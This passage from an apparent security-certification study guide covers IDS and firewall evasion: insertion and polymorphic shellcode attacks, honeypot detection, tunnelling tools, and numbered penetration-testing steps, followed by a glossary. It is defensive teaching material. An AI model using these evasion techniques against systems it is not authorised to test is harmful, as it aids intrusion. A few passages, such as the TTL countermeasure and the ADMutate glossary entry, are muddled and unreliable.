The attacker connects with the real host and tunnels the user's HTTP traffic.
The attacker inserts malicious payload into the requested Web page. Hence, code of the
attacker gets executed on the user's machine.
Insertion attack
In an insertion attack, an IDS accepts a packet and assumes that the host computer will also
accept it. But in reality, when a host system rejects the packet, the IDS accepts the attacking
string that will exploit vulnerabilities in the IDS. Such attacks can badly infect IDS signatures
and IDS signature analysis.
When NIDS is less strict in processing packets, the IDS attack takes place. The insertion attack is
used to defeat signature analysis and send request, but hides its content on the IDS with
additional data. This makes the request appear harmless.
Polymorphic shell code attack
In a polymorphic shell code attack, the attacker sends malicious data which continuously
changes its signature. The signature is changed by the attacking payload sent by the attacker.
Since the new signature of the data does not match the old signature entered into the IDS
signature database, the IDS becomes unable to point out the malicious data. Such data can harm
the network as well as the IDS.
ADMutate
ADMutate is an online tool that performs polymorphic shell code attacks. It generates a buffer
overflow exploit by transforming an attack shell code so that the new attack shell code cannot
be recognized by any Intrusion Detection Systems. When the transformed code arrives at the
server, it reassembles itself and executes as an attacking code.
Detect honeypots
Attackers can probe the services running on the system to determine the presence of honeypots.
Attackers craft malicious probe to scan for the following services:



HTTP over SSL (HTTPS)
SMTP over SSL (SMPTS)
IMAP over SSL (IMAPS)
Send-safe Honeypot, Hunter, Nessus, and Hping are tools that can be used to probe honeypots.
The presence of a honeypot is indicated by ports that show a particular service running but deny
a three-way handshake connection.
Send-Safe Honeypot Hunter
Send-Safe Honeypot Hunter is a tool used to check list of HTTPS and SOCKS proxies for
honeypots. The following are features of Send-Safe Honeypot Hunter:





It is used to check lists of HTTPS, SOCKS4, and SOCKS5 proxies with any ports.
It is used to check several remote or local proxylists at once.
It can upload "Valid proxies" and "All except honeypots" files to FTP.
It can process proxylists automatically at every specified period of time.
It may be used for validating of usual proxylist.
tcp-over-dns
tcp-over-dns includes a special dns server and a special dns client. The client and server operate
in tandem in order to provide a TCP and tunnel through the standard DNS protocol.
16.5 Identify firewall evading tools
Exam Focus: Identify firewall evading tools. Objective includes:


Identify firewall evading tools.
Analyze a firewall and IDS penetration testing.
Firewall evasion tools
The following are firewall evasion tools:








Snare Agent
Atelier Web Firewall Tester
AckCmd
Tomahawk
Your Freedom
TCPOpera
Covert TCP
Traffic IQ Gateway
Packet fragment generators
The following are packet fragment generators:








Blast
MGEN Toolset
Ettercap
Net::RawIP
hping2
SING
Libnet
Nconvert
Fragroute
Fragroute is a tool that is used to fragment packets before transmission. It can intercept, modify,
or rewrite traffic that is destined for any specific host and can be used to perform attacks such as
fragmentation, overlap, overwrite, etc. This tool is used for testing vulnerability in IDSs and
firewalls. It is also used by attackers for evading an IDS since, in most of the cases, fragmented
packets can bypass IDSs and firewalls.
Countermeasures taken while using an IDS and a firewall
The following countermeasures are taken while using an IDS and a firewall:










A switch port interface associated with a system from which attacks are being launched
should be administratively shut down.
In order to defend against the polymorphic shellcode problem, look for the nop opcode
other than 0x90.
Bifurcating analysis should be performed. In this analysis, the monitor deals with
ambiguous traffic streams. The monitor instantiates separate analysis threads for each
possible interpretation of the ambiguous traffic.
Security vulnerability awareness should be maintained as soon as possible, and the IDS
should be wisely chosen on the basis of the network topology and network traffic
received.
TCP RST packets should be generated to tear down malicious TCP sessions. Any of
several available ICMP error code packets should be issued in response to malicious
UDP traffic.
You should interact with the external firewall or router in order to add a general rule for
blocking all communication from individual IP addresses or entire networks.
A traffic normalizer should be implemented.
You should ensure that IDSs normalize fragmented packets and permit those packets to
be reassembled in the proper order. This enables the IDS to look at the information just as
the end host will see it.
The IDS system and firewall software should be regularly updated.
The TTL value should be changed to a large value. This ensures that the end host always
receives the packets. In such a case, attackers cannot slip information to the IDS. As a
result, the data never reaches the host and leaves the end host with the malicious payload.
Firewall/IDS penetration testing
Firewall/IDS penetration testing is needed due to the following reasons:








Checking if the firewall/IDS properly enforces the firewall/IDS policy of the organization
Checking if the firewall/IDS and components within the network properly enforces the
network security policy of the organization
Determining how well the firewall/IDS provides protection against externally initiated
attacks
Checking the effectiveness of the network's security perimeter
Checking how much information about a network is available from outside a network
Checking the firewall/IDS for potential breaches of security that can be exploited
Evaluating the correspondence of firewall/IDS rules with respect to the actions performed
by them
Verifying whether the security policy is correctly enforced by a sequence of firewall/IDS
rules or not
Firewall penetration testing
Take the following steps for firewall penetration testing:
1. Gain unauthorized access to a computer or a network by performing IP address spoofing.
2. Perform a fragmentation attack in order to force the TCP header information into the next
fragment to bypass the firewall.
3. Use proxy servers that block the actual IP address and display another thereby allowing
access to the blocked Website.
4. Perform ICMP tunneling in order to tunnel a backdoor application in the data portion of
ICMP echo packets.
5. Perform ACK tunneling using tools such as AckCmd to tunnel backdoor application with
TCP packets with the ACK bit set.
IDS penetration testing
Take the following steps for IDS penetration testing:
1. Encode attack packets that the IDS will not detect but an IIS Web server will decode and
become attacked by using the obfuscating technique.
2. Use a false positive generation technique in order to create a good deal of log noise to
blend real attacks with the false.
3. Perform the session splicing technique to stop the IDS by keeping the session active
longer than the IDS will spend on reassembling it.
4. Perform the Unicode evasion technique in order to evade IDS as it is possible to have
multiple representations of a single character.
5. Perform the fragmentation attack with the IDS fragmentation reassembly timeout less and
more than that of the victim.
6. Perform the overlapping fragment technique in order to craft a series of packets with TCP
sequence numbers.
7. Perform the invalid RST packets technique in order to evade detection by sending RST
packets with an invalid checksum that causes an IDS to stop processing the stream.
8. Perform the urgency flag evasion technique in order to evade IDSs as some IDSs do not
consider the TCP protocol's urgency feature.
9. Perform the polymorphic shellcode technique in order to hide the shellcode by encrypting
it in a simplistic form.
10. Perform the ASCII shellcode technique in order to bypass IDS pattern matching
signatures as strings are hidden within the shellcode as in a polymorphic shellcode.
11. Perform application layer attacks as many IDSs will have no way to check the
compressed file format for signatures.
12. Set up an encrypted session with the victim or send loads of unnecessary traffic to
produce noise that cannot be analyzed by the IDS.
Chapter Summary
In this chapter, we learned about Intrusion Detection Systems, ways to detect an intrusion, and
various types of Intrusion Detection Systems. This chapter focused on firewalls, types of
firewalls, honeypots, and types of honeypots. This chapter also covered firewall evading tools
and firewall and IDS penetration testing.
Glossary
ADMutate
ADMutate is an online tool used to perform polymorphic shell code attacks" with An online tool
to perform polymorphic shell code attacks.
Demilitarized zone
A demilitarized zone (DMZ) is a physical or logical subnetwork that contains and exposes
external services of an organization to a larger network, usually the Internet.
Evasion attack
An evasion attack is one in which an IDS rejects a malicious packet but the host computer
accepts it.
Firewall
A firewall is a combination of software and hardware that prevents data packets from coming in
or going out of a specified network or computer.
Fragroute
Fragroute is a tool used for fragmenting packets before transmission.
HIDS
A host-based intrusion detection system (HIDS) is an intrusion detection system that monitors
and analyzes the internals of a computing system rather than the network packets on its external
interfaces.
Honeypot
A honeypot is used to gain information about the intruders and their attack strategies.
Intrusion Detection System
An Intrusion Detection System (IDS) is used to detect unauthorized attempts at accessing and
manipulating computer systems locally, through the Internet or through an intranet.
KFSensor
KFSensor is a Windows-based honeypot Intrusion Detection System.
NIDS
A network intrusion detection system (NIDS) is an intrusion detection system that tries to detect
malicious activity, such as denial of service attacks, port scans or even attempts to crack into
computers by monitoring network traffic.
PIDS
A protocol-based intrusion detection system (PIDS) is an intrusion detection system, which is
typically installed on a Web server, and is used in the monitoring and analysis of the protocol in
use by the computing system.
Snorts
Snort is a sniffer tool that operates as a network sniffer. It logs the activities of the network that
is matched with the predefined signatures. Signatures can be designed for a wide range of traffic,
including Internet Protocol (IP), Transmission Control Protocol (TCP), User Datagram Protocol
(UDP), and Internet Control Message Protocol (ICMP).
Stateful firewall
A stateful firewall is a firewall that keeps track of the state of network connections (such as TCP
streams, UDP communication) traveling across it.
Tripwire
Tripwire is a System Integrity Verifier (SIV) that is used to monitor files and detect changes
made by an intruder.